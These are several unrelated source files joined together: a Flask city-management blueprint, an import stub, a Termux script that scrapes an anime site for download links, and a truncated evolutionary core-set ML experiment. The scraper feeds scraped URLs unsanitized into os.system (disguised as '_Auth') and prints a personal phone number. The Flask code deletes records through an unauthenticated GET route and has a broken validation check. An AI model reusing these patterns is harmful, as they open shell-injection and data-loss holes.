request, abort, flash
from modules.Countries.model import Country
from modules.Regions.model import Region
from modules.Cities.model import City
from modules.Shared.database import db
# collection of URLs for the cities section of the website
# setup the controller, use a local folder for templates
cities = Blueprint(
'cities',
__name__,
template_folder='templates',
static_folder='static',
url_prefix='/cities'
)
@cities.route('/')
def view_all_cities():
""" homepage with all cities in a table """
return render_template('cities/view_all.html', Cities=City)
@cities.route('/view/<city_id>')
def view_one_city(city_id):
""" view a single city in detail """
entry = City.query.get(city_id)
if not entry is None:
return render_template('cities/view.html', entry=entry)
else:
flash('Entry does not exist.', 'error')
return redirect(url_for('cities.view_all_cities'))
@cities.route('/add', methods=['GET', 'POST'])
def add_city():
""" add a city page function """
# init variables
entry = City() # creates a model.py instance, instance only has a name right now
error_msg = {}
form_is_valid = True
country_list = Country.query.all()
region_list = Region.query.all()
if request.method == 'GET':
return render_template('cities/add.html', entry=entry, \
country_list=country_list, \
region_list=region_list, \
error_msg=error_msg)
if request.method == 'POST':
# validate input
[entry, form_is_valid, error_msg] = form_validate_city(entry)
# check if the form is valid
if not form_is_valid:
# current_app.logger.info('invalid add city')
return render_template('cities/add.html', entry=entry, \
country_list=country_list, \
region_list=region_list, \
error_msg=error_msg)
# the data is valid, save it
db.session.add(entry)
db.session.commit()
return redirect(url_for('cities.view_one_city', \
city_id=entry.city_id))
# current_app.logger.error("unsupported method")
@cities.route('/edit/<city_id>', methods=['GET', 'POST'])
def edit_city(city_id):
""" edit city details """
# init variables
entry = City.query.get(city_id)
error_msg = {}
form_is_valid = True
country_list = Country.query.all()
region_list = Region.query.all()
if request.method == 'GET':
return render_template('cities/edit.html', \
entry=entry, error_msg=error_msg, \
country_list=country_list, \
region_list=region_list)
if request.method == 'POST':
# validate input
[entry, form_is_valid, error_msg] = form_validate_city(entry)
# check if the form is valid
if not form_is_valid:
# current_app.logger.info('invalid edit city: ' + str(entry))
return render_template('cities/edit.html', entry=entry, \
country_list=country_list, \
region_list=region_list, \
error_msg=error_msg)
# the data is valid, save it
db.session.commit()
return redirect(url_for('cities.view_one_city', \
city_id=entry.city_id))
# current_app.logger.error("unsupported method")
def form_validate_city(entry):
""" validate City form data """
# validate data
form_is_valid = True
error_msg = {}
# retrieve data from the global Request object
data = request.form
if not 'city_name' or not 'country_id' or not 'region_id' in data:
if not 'city_name' in data:
error_msg['city_name'] = "Please fill in the city name."
if not 'country_id' in data:
error_msg['country_id'] = "Please choose the country."
if not 'region_id' in data:
error_msg['region_id'] = "Please choose the region."
form_is_valid = False
return [entry, form_is_valid, error_msg]
# get string, cast to ASCII, truncate to 128 chars, strip multi spaces
entry.city_name = \
re.sub(' +', ' ',
data['city_name'].encode('ascii', 'ignore')[:127])
# retrieve ids in the data var from the html form
if data['country_id'].isdigit():
entry.country_id = int(data['country_id'])
else:
form_is_valid = False
error_msg['country_id'] = "Please choose the country."
if data['region_id'].isdigit():
entry.region_id = int(data['region_id'])
else:
form_is_valid = False
error_msg['region_id'] = "Please choose the region."
# ensure the city_name is filled in
if not entry.city_name:
form_is_valid = False
error_msg['city_name'] = "Please fill in the city name."
# city name underflow check, 2 or less characters
if len(entry.city_name) < 3:
form_is_valid = False
error_msg['city_name'] = "Please fill in the city name completely."
# ensure the city name is letters
match = re.match('^[a-zA-Z ]*$', entry.city_name)
if not match:
form_is_valid = False
error_msg['city_name'] = "Please fill in a city name only with English letters."
# else:
# current_app.logger.info("match = " + str(match.group(0)))
# ensure country_id and region_id are chosen
if not entry.country_id:
form_is_valid = False
error_msg['country_id'] = "Please choose the country."
if not entry.region_id:
form_is_valid = False
error_msg['region_id'] = "Please choose the region."
return [entry, form_is_valid, error_msg]
@cities.route('/delete/<city_id>')
def delete_city(city_id):
""" delete a city """
entry = City.query.get(city_id)
# check something doesnt exist
if entry is None:
return abort(400, 'Entry does not exist.')
db.session.delete(entry)
db.session.commit()
return redirect(url_for('cities.view_all_cities'))
|
from __future__ import print_function, absolute_import
from .image import ImageSoftmaxEngine, ImageTripletEngine,ImageHardTripletEngine
from .video import VideoSoftmaxEngine, VideoTripletEngine
from .engine import Engine
|
#!/data/data/com.termux/files/usr/bin/python
# Update : (2020-09-03 23:04:09)
# Finish : Now!
# © Copyright 2020 | Ezz-Kun | kyun-kyunnn
from bs4 import BeautifulSoup as bs_
from os import system as _Auth
from string import ascii_letters as _ascii
from time import sleep
from random import randint
import requests as req_
import sys
b = '\033[1;34m'
h = '\033[1;32m'
p = '\033[1;37m'
m = '\033[1;31m'
class _print(object):
def __init__(self,string):
for i in string +'\n':
sys.stdout.write(str(i))
sys.stdout.flush()
sleep(0.00050)
__banner__ = (f""" {b}╔═╗{p}┌─┐{b}╦ {p}┌─┐┬ ┬┌─┐┬─┐{b}╔═╗ ╦ ╦{p}┬─┐{b}╦
{b}║ ║{p}├─┘{b}║ {p}│ │└┐┌┘├┤ ├┬┘{b}╔═╝{p}───{b}║ ║{p}├┬┘{b}║
╚═╝{p}┴ {b}╩═╝{p}└─┘ └┘ └─┘┴└─{b}╚═╝ ╚═╝{p}┴└─{b}╩═╝
┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈{b}≻
{b}[{h}≈{b}]{p} Author {b}:{p} Ezz-Kun {b}|{h} (´•ω•`๑)
{b}[{h}≈{b}]{p} Tools {b}:{p} Oploverz {m}~{p} Url
{b}[{h}≈{b}]{p} Versi {b}:{p} {randint(10,999)}.{randint(10,100)} Update{m} !
{h}► {b}[{p}Oploverz{b}]{h} ◄
""")
class _OpLoverz(object):
def __init__(self,url):
if 'https://' not in url:
self.url = (f"https://www.oploverz.in/?s={url.replace(' ','+')}&post_type=post")
else:
self.url = url
self.headers = {"User-Agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.83 Safari/537.1"}
self.judul = []
self.href_ = []
self.info = []
self.links = []
self.server = []
self.sorattl = []
self._GetInformation(self.url)
def _GetInformation(self,url_):
try:
_shogi = req_.get(url_,headers=self.headers).text
_bes = bs_(_shogi,'html.parser')
_data = _bes.findAll('div',class_='dtl')
next_ = _bes.find('a',class_='nextpostslink',rel='next')
prev_ = _bes.find('a',class_='previouspostslink',rel='prev')
if len(_data) != 0:
for cek_ in _data:
self.judul.append(cek_.find('a')["title"])
self.href_.append(cek_.find('a')["href"])
self.info.append(cek_.find('span').text)
_Auth('clear')
_print(__banner__)
for yui, yui_ in enumerate(self.judul):
_print(f' {b}[{p}{yui+1}{b}].{p}{yui_}')
if next_ != None:
_print(f"""
{b}[{h}» {p}{_bes.find('span',class_='pages').text} {h}«{b}]{p}
{b}[{p} Type {b}[{p}N{b}]{p} For Next Type {b}[{p}P{b}]{p} For Prev {b}]{p}""")
_cos = input(f'\n {b}[{h}»{p}Opz{h}«{b}]{p} Choice {b}≽{p} ')
if _cos == '':
exit(f' {b}[{h}»{p}Opz{h}«{b}]{p} Choice Is None !')
elif str(_cos) in _ascii:
if str(_cos).lower() == 'n':
_OpLoverz(next_["href"])
elif str(_cos).lower() == 'p':
if prev_ != None:
_OpLoverz(prev_["href"])
else:
exit(f' {b}[{h}»{p}Opz{h}«{b}]{p} Can Not Previous First Pages!')
elif str(_cos) not in _ascii:
if int(_cos)-1 < len(self.href_):
# print(self.href_)
self._downloadPages(self.href_[int(_cos)-1])
else:
exit(f' {b}[{m}»{p}Err{m}«{b}]{p} Your Choice Out Of Index!')
else:
exit(f' {b}[{m}»{p}Err{m}«{b}]{p} Invalid Choice!')
else:
exit(f' {b}[{m}»{p}Err{m}«{b}]{p} Title ``url`` Not Found In Oploverz')
except req_.exceptions.ConnectionError:
exit(f' {b}[{m}»{p}Err{m}«{b}]{p} No Internet Connection{m}!')
except (EOFError,KeyboardInterrupt):
exit(f' {b}[{m}»{p}Err{m}«{b}]{p} Passing{m}!{p}')
def _downloadPages(self,_url):
try:
_shogi = req_.get(_url,headers=self.headers).text
_bes = bs_(_shogi,'html.parser')
sora_ttl = _bes.findAll('div',class_='sorattl title-download')
sora_url = _bes.findAll('div',class_='soraurl list-download')
list(self.sorattl.append(_.text.split(' – ')[-1]) for _ in sora_ttl)
_Auth('clear')
_print(__banner__)
for ciu, ciu_ in enumerate(self.sorattl):
_print(f' {b}[{p}{ciu+1}{b}].{p}{ciu_}')
_sor = int(input(f'\n {b}[{h}»{p}Opz{h}«{b}]{p} Choice {b}≽{p} '))
if (_sor-1) < len(sora_url):
for cek in sora_url[_sor-1].findAll('a'):
self.server.append(cek.text)
self.links.append(cek["href"])
for serv, serv_ in enumerate(self.server):
_print(f' {b}[{p}{serv+1}{b}].{p}{serv_} {b}≽{p} {self.links[serv]}')
_opz = int(input(f'\n {b}[{h}»{p}Opz{h}«{b}]{p} Open To Browser {b}≽{p} '))
if (_opz-1) < len(self.links):
# print(self.links[_opz-1])
_Auth(f'termux-open {self.links[_opz-1]}')
_OpLoverz(self.url)
else:
exit(' {b}[{m}»{p}Err{m}«{b}]{p} Your Choice Out Of Range{m}!{p}')
else:
exit(' {b}[{m}»{p}Err{m}«{b}]{p} Your Choice Out Of Range{m}!{p}')
except req_.exceptions.ConnectionError:
exit(f' {b}[{m}»{p}Err{m}«{b}]{p} No Internet Connection{m}!')
except (EOFError,KeyboardInterrupt,ValueError):
exit(f' {b}[{m}»{p}Err{m}«{b}]{p} Passing{m}!{p}')
def _MainOpz():
_Auth('clear')
_print(__banner__)
print(f""" {b}[{p}01{b}].{p}Search Title
{b}[{p}02{b}].{p}More Information
{b}[{p}03{b}].{p}Exit""")
try:
_cus = int(input(f'\n {b}[{h}»{p}Opz{h}«{b}]{p} Choice {b}≽{p} '))
if _cus == '':
exit(f' {b}[{h}»{p}Opz{h}«{b}]{p} Choice Is Nothing!')
elif _cus == 1:
_Auth('clear')
_print(__banner__)
jdl_ = input(f' {b}[{h}»{p}Opz{h}«{b}]{p} Title {b}≽{p} ')
if jdl_ == '':
exit(f' {b}[{h}»{p}Opz{h}«{b}]{p} Title Is Nothing!')
else:
_OpLoverz(jdl_)
elif _cus == 2:
_print(f"""
{m}▪{p} Gak Ada Yang Beda ,Cuman Fix Error Doang Gak Ada
Function Auto Download Nya, Sengaja Lewat Open Browser
Biar Bisa Ke UC Browser& Download Juga Jadi Wuzz.. Wuzz..
{m}▪{p} Yang Nama Nya Web Anime Ya Pasti Gak Ada Yang
Lengkap, Kalau Anime Yang Di Cari Gak Ada Di Oploverz
Bisa Pake Yg Neonime, Kalau Batch Bisa Pake Yg Kusonime
{b}▪{p} Versi KusoNime {b}≽{p} https://github.com/Ezz-Kun/kusonime-url
{b}▪{p} Versi NeoNime {b}≽{p} https://github.com/Ezz-Kun/neonime-url
{h}▪{p} Contact Wa : 085325463021
""")
input(f' {b}[{h}»{p}Opz{h}«{b}]{p} Enter To Back!')
_MainOpz()
elif _cus == 3:
exit(f' {b}[{m}»{p}Err{m}«{b}]{p} Exit Tools{m}!')
else:
exit(f' {b}[{h}»{p}Opz{h}«{b}]{p} Invalid Choice!')
except (ValueError,KeyboardInterrupt,EOFError):
exit(f' {b}[{m}»{p}Err{m}«{b}]{p} Something Error{m}!{p}')
if __name__=="__main__":
_MainOpz()
|
# This script has been designed to perform multi-objective learning of core sets
# by Alberto Tonda and Pietro Barbiero, 2018 <alberto.tonda@gmail.com> <pietro.barbiero@studenti.polito.it>
#basic libraries
import argparse
import copy
import datetime
import inspyred
import matplotlib.pyplot as plt
import numpy as np
import random
import os
import sys
import logging
import time
import tensorflow as tf
# sklearn library
from sklearn import datasets
from sklearn.datasets.samples_generator import make_blobs, make_circles, make_moons
from sklearn.preprocessing import StandardScaler
from sklearn.metrics import accuracy_score
from sklearn.ensemble import AdaBoostClassifier
from sklearn.ensemble import BaggingClassifier
from sklearn.ensemble import ExtraTreesClassifier
from sklearn.ensemble import GradientBoostingClassifier
from sklearn.ensemble import RandomForestClassifier
from sklearn.linear_model import ElasticNet
from sklearn.linear_model import ElasticNetCV
from sklearn.linear_model import Lasso
from sklearn.linear_model import LassoCV
from sklearn.linear_model import LinearRegression
from sklearn.linear_model import LogisticRegression
from sklearn.linear_model import LogisticRegressionCV
from sklearn.linear_model import PassiveAggressiveClassifier
from sklearn.linear_model import RidgeClassifier
from sklearn.linear_model import RidgeClassifierCV
from sklearn.linear_model import SGDClassifier
from sklearn.svm import SVC
# pandas
from pandas import read_csv
import seaborn as sns
from matplotlib.colors import ListedColormap
import warnings
warnings.filterwarnings("ignore")
def main(selectedDataset = "digits", pop_size = 100, max_generations = 100):
# a few hard-coded values
figsize = [5, 4]
seed = 42
max_points_in_core_set = 99
min_points_in_core_set = 1 # later redefined as 1 per class
# pop_size = 300
offspring_size = 2 * pop_size
# max_generations = 300
maximize = False
# selectedDataset = "digits"
selectedClassifiers = ["SVC"]
n_splits = 10
# a list of classifiers
allClassifiers = [
[RandomForestClassifier, "RandomForestClassifier", 1],
[BaggingClassifier, "BaggingClassifier", 1],
[SVC, "SVC", 1],
[RidgeClassifier, "RidgeClassifier", 1],
# [AdaBoostClassifier, "AdaBoostClassifier", 1],
# [ExtraTreesClassifier, "ExtraTreesClassifier", 1],
# [GradientBoostingClassifier, "GradientBoostingClassifier", 1],
# [SGDClassifier, "SGDClassifier", 1],
# [PassiveAggressiveClassifier, "PassiveAggressiveClassifier", 1],
# [LogisticRegression, "LogisticRegression", 1],
]
selectedClassifiers = [classifier[1] for classifier in allClassifiers]
folder_name = datetime.datetime.now().strftime("%Y-%m-%d-%H-%M") + "-evocore2C-" + selectedDataset + "-" + str(pop_size)
if not os.path.exists(folder_name) :
os.makedirs(folder_name)
else :
sys.stderr.write("Error: folder \"" + folder_name + "\" already exists. Aborting...\n")
sys.exit(0)
# open the logging file
logfilename = os.path.join(folder_name, 'logfile.log')
logger = setup_logger('logfile_' + folder_name, logfilename)
logger.info("All results will be saved in folder \"%s\"" % folder_name)
# load different datasets, prepare them for use
logger.info("Preparing data...")
# synthetic databases
# centers = [[1, 1], [-1, -1], [1, -1]]
# blobs_X, blobs_y = make_blobs(n_samples=400, centers=centers, n_features=2, cluster_std=0.6, random_state=seed)
# circles_X, circles_y = make_circles(n_samples=400, noise=0.15, factor=0.4, random_state=seed)
# moons_X, moons_y = make_moons(n_samples=400, noise=0.2, random_state=seed)
# iris = datasets.load_iris()
# digits = datasets.load_digits()
wine = datasets.load_wine()
# breast = datasets.load_breast_cancer()
# pairs = datasets.fetch_lfw_pairs()
# olivetti = datasets.fetch_olivetti_faces()
# forest_X, forest_y = loadForestCoverageType() # local function
# mnist_X, mnist_y = loadMNIST() # local function
# plants = datasets.fetch_openml(name='one-hundred-plants-margin', cache=False)
# isolet = datasets.fetch_openml(name='isolet', cache=False)
# ctg = datasets.fetch_openml(name='cardiotocography', cache=False)
# ozone = datasets.fetch_openml(name='ozone-level-8hr', cache=False)
# ilpd = datasets.fetch_openml(name='ilpd', cache=False)
# biodeg = datasets.fetch_openml(name='qsar-biodeg', cache=False)
# hill = datasets.fetch_openml(name='hill-valley', cache=False)
dataList = [
# [blobs_X, blobs_y, 0, "blobs"],
# [circles_X, circles_y, 0, "circles"],
# [moons_X, moons_y, 0, "moons"],
# [iris.data, iris.target, 0, "iris4"],
# [iris.data[:, 2:4], iris.target, 0, "iris2"],
# [digits.data, digits.target, 0, "digits"],
[wine.data, wine.target, 0, "wine"],
# [breast.data, breast.target, 0, "breast"],
# [pairs.data, pairs.target, 0, "pairs"],
# [olivetti.data, olivetti.target, 0, "people"],
# [forest_X, forest_y, 0, "covtype"],
# [mnist_X, mnist_y, 0, "mnist"],
# [plants.data, plants.target, 0, "plants"],
# [isolet.data, isolet.target, 0, "isolet"],
# [ctg.data, ctg.target, 0, "ctg"],
# [ozone.data, ozone.target, 0, "ozone"],
# [ilpd.data, ilpd.target, 0, "ilpd"],
# [biodeg.data, biodeg.target, 0, "biodeg"],
# [hill.data, hill.target, 0, "hill-valley"],
]
# argparse; all arguments are optional
parser = argparse.ArgumentParser()
parser.add_argument("--classifiers", "-c", nargs='+', help="Classifier(s) to be tested. Default: %s. Accepted values: %s" % (selectedClassifiers[0], [x[1] for x in allClassifiers]))
parser.add_argument("--dataset", "-d", help="Dataset to be tested. Default: %s. Accepted values: %s" % (selectedDataset,[x[3] for x in dataList]))
parser.add_argument("--pop_size", "-p", type=int, help="EA population size. Default: %d" % pop_size)
parser.add_argument("--offspring_size", "-o", type=int, help="Ea offspring size. Default: %d" % offspring_size)
parser.add_argument("--max_generations", "-mg", type=int, help="Maximum number of generations. Default: %d" % max_generations)
parser.add_argument("--min_points", "-mip", type=int, help="Minimum number of points in the core set. Default: %d" % min_points_in_core_set)
parser.add_argument("--max_points", "-mxp", type=int, help="Maximum number of points in the core set. Default: %d" % max_points_in_core_set)
# finally, parse the arguments
args = parser.parse_args()
# a few checks on the (optional) inputs
if args.dataset :
selectedDataset = args.dataset
if selectedDataset not in [x[3] for x in dataList] :
print("Error: dataset \"%s\" is not an accepted value. Accepted values: %s" % (selectedDataset, [x[3] for x in dataList]))
sys.exit(0)
if args.classifiers != None and len(args.classifiers) > 0 :
selectedClassifiers = args.classifiers
for c in selectedClassifiers :
if c not in [x[1] for x in allClassifiers] :
print("Error: classifier \"%s\" is not an accepted value. Accepted values: %s" % (c, [x[1] for x in allClassifiers]))
sys.exit(0)
if args.min_points : min_points_in_core_set = args.min_points
if args.max_points : max_points_in_core_set = args.max_points
if args.max_generations : max_generations = args.max_generations
if args.pop_size : pop_size = args.pop_size
if args.offspring_size : offspring_size = args.offspring_size
# TODO: check that min_points < max_points and max_generations > 0
# print out the current settings
logger.info("Settings of the experiment...")
logger.info("Fixed random seed:", seed)
logger.info("Selected dataset: %s; Selected classifier(s): %s" % (selectedDataset, selectedClassifiers))
# logger.info("Min points in candidate core set: %d; Max points in candidate core set: %d" % (min_points_in_core_set, max_points_in_core_set))
logger.info("Population size in EA: %d; Offspring size: %d; Max generations: %d" % (pop_size, offspring_size, max_generations))
# create the list of classifiers
classifierList = [ x for x in allClassifiers if x[1] in selectedClassifiers ]
# pick the dataset
db_index = -1
for i in range(0, len(dataList)) :
if dataList[i][3] == selectedDataset :
db_index = i
dbname = dataList[db_index][3]
X, y = dataList[db_index][0], dataList[db_index][1]
number_classes = np.unique(y).shape[0]
logger.info("Creating train/test split...")
from sklearn.model_selection import StratifiedKFold
skf = StratifiedKFold(n_splits=n_splits, shuffle=True, random_state=seed)
listOfSplits = [split for split in skf.split(X, y)]
trainval_index, test_index = listOfSplits[0]
X_trainval, y_trainval = X[trainval_index], y[trainval_index]
X_test, y_test = X[test_index], y[test_index]
skf = StratifiedKFold(n_splits=3, shuffle=False, random_state=seed)
listOfSplits = [split for split in skf.split(X_trainval, y_trainval)]
train_index, val_index = listOfSplits[0]
X_train, y_train = X_trainval[train_index], y_trainval[train_index]
X_val, y_val = X_trainval[val_index], y_trainval[val_index]
logger.info("Training set: %d lines (%.2f%%); test set: %d lines (%.2f%%)" % (X_trainval.shape[0], (100.0 * float(X_trainval.shape[0]/X.shape[0])), X_test.shape[0], (100.0 * float(X_test.shape[0]/X.shape[0]))))
# rescale data
scaler = StandardScaler()
sc = scaler.fit(X_train)
X = sc.transform(X)
X_trainval = sc.transform(X_trainval)
X_train = sc.transform(X_train)
X_val = sc.transform(X_val)
X_test = sc.transform(X_test)
for classifier in classifierList:
classifier_name = classifier[1]
# start creating folder name
experiment_name = os.path.join(folder_name, datetime.datetime.now().strftime("%Y-%m-%d-%H-%M")) + "-core-set-evolution-" + dbname + "-" + classifier_name
if not os.path.exists(experiment_name) : os.makedirs(experiment_name)
logger.info("Classifier used: " + classifier_name)
max_points_in_core_set = X_train.shape[0]
start = time.time()
min_points_in_core_set = number_classes
solutions, trainAccuracy, testAccuracy = evolveCoreSets(X, y, X_train, y_train, X_test, y_test, classifier, pop_size, offspring_size, max_generations, min_points_in_core_set, max_points_in_core_set, number_classes, maximize, seed=seed, experiment_name=experiment_name)
end = time.time()
exec_time = end - start
# only candidates with all classes are considered
final_archive = []
for sol in solutions :
c = sol.candidate
individual = np.array(c, dtype=bool)
indPoints = individual[ :X_train.shape[0] ]
y_core = y_train[indPoints]
if len(set(y_core)) == number_classes :
final_archive.append(sol)
# logger.info("Now saving final Pareto front in a figure...")
pareto_front_x = [ f.fitness[0] for f in final_archive ]
pareto_front_y = [ f.fitness[1] for f in final_archive ]
pareto_front_z = [ f.fitness[2] for f in final_archive ]
# figure = plt.figure(figsize=figsize)
# ax = figure.add_subplot(111)
# ax.plot(pareto_front_x, pareto_front_y, "bo-", label="Solutions in final archive")
# ax.set_title("Optimal solutions")
# ax.set_xlabel("Core set size")
# ax.set_ylabel("Error")
# ax.set_xlim([1, X_train.shape[0]])
# ax.set_ylim([0, 0.4])
# plt.tight_layout()
# plt.savefig( os.path.join(experiment_name, "%s_EvoCore_%s_pareto.png" %(dbname, classifier_name)) )
# plt.savefig( os.path.join(experiment_name, "%s_EvoCore_%s_pareto.pdf" %(dbname, classifier_name)) )
# plt.close(figure)
figure = plt.figure(figsize=figsize)
ax = figure.add_subplot(111)
ax.plot(pareto_front_x, pareto_front_y, "bo", label="Solutions in final archive")
ax.set_title("Optimal solutions")
ax.set_xlabel("Core set size")
ax.set_ylabel("Core feature size")
plt.tight_layout()
plt.savefig( os.path.join(experiment_name, "%s_EvoCore_%s_pareto_zoom_xy.png" %(dbname, classifier_name)) )
plt.savefig( os.path.join(experiment_name, "%s_EvoCore_%s_pareto_zoom_xy.pdf" %(dbname, classifier_name)) )
plt.close(figure)
figure = plt.figure(figsize=figsize)
ax = figure.add_subplot(111)
ax.plot(pareto_front_x, pareto_front_z, "bo", label="Solutions in final archive")
ax.set_title("Optimal solutions")
ax.set_xlabel("Core set size")
ax.set_ylabel("Error")
plt.tight_layout()
plt.savefig( os.path.join(experiment_name, "%s_EvoCore_%s_pareto_zoom_xz.png" %(dbname, classifier_name)) )
plt.savefig( os.path.join(experiment_name, "%s_EvoCore_%s_pareto_zoom_xz.pdf" %(dbname, classifier_name)) )
plt.close(figure)
figure = plt.figure(figsize=figsize)
ax = figure.add_subplot(111)
ax.plot(pareto_front_y, pareto_front_z, "bo", label="Solutions in final archive")
ax.set_title("Optimal solutions")
ax.set_xlabel("Core feature size")
ax.set_ylabel("Error")
plt.tight_layout()
plt.savefig( os.path.join(experiment_name, "%s_EvoCore_%s_pareto_zoom_yz.png" %(dbname, classifier_name)) )
plt.savefig( os.path.join(experiment_name, "%s_EvoCore_%s_pareto_zoom_yz.pdf" %(dbname, classifier_name)) )
plt.close(figure)
# initial performance
X_err, testAccuracy, model, fail_points, y_pred = evaluate_core(X_trainval, y_trainval, X_test, y_test, classifier[0], cname=classifier_name, SEED=seed)
X_err, trainAccuracy, model, fail_points, y_pred = evaluate_core(X_trainval, y_trainval, X_trainval, y_trainval, classifier[0], cname=classifier_name, SEED=seed)
# logger.info("Compute performances!")
logger.info("Problem dimensions: #samples: %d - #features: %d - #classes: %d" % (X.shape[0], X.shape[1], number_classes))
logger.info("Initial performance with #samples: %d - #features: %d --> train=%.4f, test=%.4f" % (X_trainval.shape[0], X.shape[1], trainAccuracy, testAccuracy))
logger.info("Elapsed time using EvoCore2C (seconds): %.4f" %(exec_time))
# best solution
accuracy = []
for sol in final_archive :
c = sol.candidate
individual = np.array(c, dtype=bool)
indPoints = individual[ :X_train.shape[0] ]
indFeatures = individual[ X_train.shape[0]: ]
X_core = X_train[indPoints]
X_core = X_core[:, indFeatures]
y_core = y_train[indPoints]
X_trainval_t = X_trainval[:, indFeatures]
X_train_t = X_train[:, indFeatures]
X_val_t = X_val[:, indFeatures]
X_err, accuracy_val, model, fail_points, y_pred = evaluate_core(X_core, y_core, X_val_t, y_val, classifier[0], cname=classifier_name, SEED=seed)
X_err, accuracy_train, model, fail_points, y_pred = evaluate_core(X_core, y_core, X_train_t, y_train, classifier[0], cname=classifier_name, SEED=seed)
accuracy.append( np.mean([accuracy_val, accuracy_train]) )
best_ids = np.array(np.argsort(accuracy)).astype('int')[::-1]
count = 0
for i in best_ids:
if count > 2:
break
c = final_archive[i].candidate
individual = np.array(c, dtype=bool)
indPoints = individual[ :X_train.shape[0] ]
indFeatures = individual[ X_train.shape[0]: ]
X_core = X_train[indPoints]
X_core = X_core[:, indFeatures]
y_core = y_train[indPoints]
X_t = X[:, indFeatures]
X_trainval_t = X_trainval[:, indFeatures]
X_train_t = X_train[:, indFeatures]
X_val_t = X_val[:, indFeatures]
X_test_t = X_test[:, indFeatures]
X_err, accuracy_train, model, fail_points, y_pred = evaluate_core(X_core, y_core, X_train_t, y_train, classifier[0], cname=classifier_name, SEED=seed)
X_err, accuracy_val, model, fail_points, y_pred = evaluate_core(X_core, y_core, X_val_t, y_val, classifier[0], cname=classifier_name, SEED=seed)
X_err, accuracy, model, fail_points, y_pred = evaluate_core(X_core, y_core, X_test_t, y_test, classifier[0], cname=classifier_name, SEED=seed)
logger.info("Solution %d: #samples: %d - #features: %d --> train: %.4f, val: %.4f, test: %.4f" %(count, X_core.shape[0], X_core.shape[1], accuracy_train, accuracy_val, accuracy))
if (dbname == "mnist" or dbname == "digits") and count == 0:
if dbname == "mnist":
H, W = 28, 28
if dbname == "digits":
H, W = 8, 8
# logger.info("Now saving figures...")
core_features = np.zeros((X_train.shape[1], 1))
core_features[indFeatures] = 1
core_features = np.reshape(core_features, (H, W))
flatui = ["#ffffff", "#e74c3c"]
cmap = ListedColormap(sns.color_palette(flatui).as_hex())
# sns.palplot(sns.color_palette(flatui))
X_t = np.zeros((X_core.shape[0], H*W))
k = 0
for i in range(0, len(indFeatures)):
if indFeatures[i] == True:
X_t[:, i] = X_core[:, k]
k = k + 1
# # save archetypes
# for index in range(0, len(y_core)):
# image = np.reshape(X_t[index, :], (H, W))
# plt.figure()
# plt.axis('off')
# plt.imshow(image, cmap=plt.cm.gray_r)
# plt.imshow(core_features, cmap=cmap, alpha=0.3)
# plt.title('Label: %d' %(y_core[index]))
# plt.tight_layout()
# plt.savefig( os.path.join(experiment_name, "digit_%d_idx_%d.pdf" %(y_core[index], index)) )
# plt.savefig( os.path.join(experiment_name, "digit_%d_idx_%d.png" %(y_core[index], index)) )
# plt.close()
# save test errors
e = 1
for index in range(0, len(y_test)):
if fail_points[index] == True:
image = np.reshape(X_test[index, :], (H, W))
plt.figure()
plt.axis('off')
plt.imshow(image, cmap=plt.cm.gray_r)
plt.imshow(core_features, cmap=cmap, alpha=0.3)
plt.title('Label: %d - Prediction: %d' %(y_test[index], y_pred[index]))
plt.tight_layout()
plt.savefig( os.path.join(experiment_name, "err_lab_%d_pred_%d_idx_%d.pdf" %(y_test[index], y_pred[index], e)) )
plt.savefig( os.path.join(experiment_name, "err_lab_%d_pred_%d_idx_%d.png" %(y_test[index], y_pred[index], e)) )
plt.close()
e = e + 1
# plot decision boundaries if we have only 2 dimensions!
if X_core.shape[1] == 2:
cmap = ListedColormap(sns.color_palette("bright", 3).as_hex())
xx, yy = make_meshgrid(X_t[:, 0], X_t[:, 1])
figure = plt.figure(figsize=figsize)
_, Z_0 = plot_contours(model, xx, yy, colors='k', alpha=0.2)
# plt.scatter(X_train[:, 0], X_train[:, 1], c=y_train, cmap=cmap, marker='s', alpha=0.4, label="train")
plt.scatter(X_test_t[:, 0], X_test_t[:, 1], c=y_test, cmap=cmap, marker='+', alpha=0.3, label="test")
plt.scatter(X_core[:, 0], X_core[:, 1], c=y_core, cmap=cmap, marker='D', facecolors='none', edgecolors='none', alpha=1, label="core set")
plt.scatter(X_err[:, 0], X_err[:, 1], marker='x', facecolors='k', edgecolors='k', alpha=1, label="errors")
plt.legend()
plt.title("%s - acc. %.4f" %(classifier_name, accuracy))
plt.tight_layout()
plt.savefig( os.path.join(experiment_name, "%s_EvoCore2C_%s_%d.png" %(dbname, classifier_name, count)) )
plt.savefig( os.path.join(experiment_name, "%s_EvoCore2C_%s_%d.pdf" %(dbname, classifier_name, count)) )
plt.close(figure)
if count == 0:
# using all samples in the training set
X_err, accuracy, model, fail_points, y_pred = evaluate_core(X_trainval, y_trainval, X_test, y_test, classifier[0], cname=classifier_name, SEED=seed)
X_err_t = X_err[:, indFeatures]
X_err_train, trainAccuracy, model_train, fail_points_train, y_pred_train = evaluate_core(X_trainval, y_trainval, X_trainval, y_trainval, classifier[0], cname=classifier_name, SEED=seed)
figure = plt.figure(figsize=figsize)
# _, Z_0 = plot_contours(model, xx, yy, colors='k', alpha=0.2)
plt.scatter(X_trainval_t[:, 0], X_trainval_t[:, 1], c=y_trainval, cmap=cmap, marker='s', alpha=0.4, label="train")
plt.scatter(X_test_t[:, 0], X_test_t[:, 1], c=y_test, cmap=cmap, marker='+', alpha=0.4, label="test")
plt.scatter(X_err_t[:, 0], X_err_t[:, 1], marker='x', facecolors='k', edgecolors='k', alpha=1, label="errors")
plt.legend()
plt.title("%s - acc. %.4f" %(classifier_name, accuracy))
plt.tight_layout()
plt.savefig( os.path.join(experiment_name, "%s_EvoCore2C_%s_alltrain.png" %(dbname, classifier_name)) )
plt.savefig( os.path.join(experiment_name, "%s_EvoCore2C_%s_alltrain.pdf" %(dbname, classifier_name)) )
plt.close(figure)
count = count + 1
logger.handlers.pop()
return
# function that does most of the work
def evolveCoreSets(X, y, X_train, y_train, X_test, y_test, classifier, pop_size, offspring_size, max_generations, min_points_in_core_set, max_points_in_core_set, number_classes, maximize=True, seed=None, experiment_name=None, split="") :
classifier_class = classifier[0]
classifier_name = classifier[1]
classifier_type = classifier[2]
# a few checks on the arguments
if seed == None : seed = int( time.time() )
if experiment_name == None :
experiment_name = datetime.datetime.now().strftime("%Y-%m-%d-%H-%M") + "-ea-impair-" + classifier_name
elif split != "" :
